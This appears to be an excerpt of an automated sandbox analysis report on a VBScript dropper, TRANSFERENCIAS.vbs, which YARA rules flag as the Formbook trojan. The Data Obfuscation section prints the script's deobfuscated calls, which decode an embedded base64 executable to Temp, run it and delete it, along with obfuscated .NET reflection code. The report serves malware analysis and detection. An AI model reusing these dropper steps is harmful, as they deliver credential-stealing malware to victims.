          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1B95010_2_02F1B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBEEDB10_2_02FBEEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F09EB010_2_02F09EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F12E9010_2_02F12E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBCE9310_2_02FBCE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00E5910_2_02F00E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBEE2610_2_02FBEE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0CFE010_2_02F0CFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF2FC810_2_02EF2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBFFB110_2_02FBFFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F7EFA010_2_02F7EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F01F9210_2_02F01F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F74F4010_2_02F74F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F20F3010_2_02F20F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F42F2810_2_02F42F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBFF0910_2_02FBFF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FBFCF210_2_02FBFCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF0CF210_2_02EF0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FA0CB510_2_02FA0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F79C3210_2_02F79C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F00C0010_2_02F00C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EFADE010_2_02EFADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F1FDC010_2_02F1FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F18DBF10_2_02F18DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB7D7310_2_02FB7D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02FB1D5A10_2_02FB1D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F03D4010_2_02F03D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02F0AD0010_2_02F0AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F35130 appears 36 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F47E54 appears 96 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02EEB970 appears 265 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F7F290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02F6EA12 appears 86 times
          Source: TRANSFERENCIAS.vbsInitial sample: Strings found which are bigger than 50
          Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: temp_executable.exe.0.dr, AesHelper.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, AesHelper.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, AesHelper.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@7/2@1/1
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMutant created: NULL
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\temp_executable.exeJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.1324624644.000002387ED7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318550574.000002387ED7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1319390729.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318437273.000002387EA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1324207380.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318568461.000002387EA8C000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAEaw9OcAAAAAAAAAAOAALgELAQYAAMoAAAAKAAAAAAAALug");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe");IFileSystem3.DeleteFile("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe")
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
          Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
          Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
          Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
          Source: temp_executable.exe.0.drStatic PE information: 0xE7F4B046 [Sun Apr 26 08:26:46 2093 UTC]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004030E0 push eax; ret 10_2_004030E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0041488D pushfd ; iretd 10_2_0041488F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00401966 push esi; iretd 10_2_00401967
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00402179 push ss; retf 10_2_0040213D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0041F1A0 push ss; ret 10_2_0041F1A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040D4C7 push edx; ret 10_2_0040D514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040D4CD push edx; ret 10_2_0040D514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00418DD0 push ebp; ret 10_2_00418DE6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040D589 push edx; ret 10_2_0040D514
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004116BB push edi; retf 10_2_004116BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042373B push es; ret 10_2_004237D2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00413FC3 push edi; ret 10_2_00413FCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004237B1 push es; ret 10_2_004237D2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02EF09AD push ecx; mov dword ptr [esp], ecx10_2_02EF09B6
          Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
          Source: temp_executable.exe.0.dr, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
          Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
          Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
          Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
          Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
          Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.csHigh entropy of concatenated method names: 'D4r4O0AxSI', 'CZ0yVOx8S97IE', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
          Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_executable.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
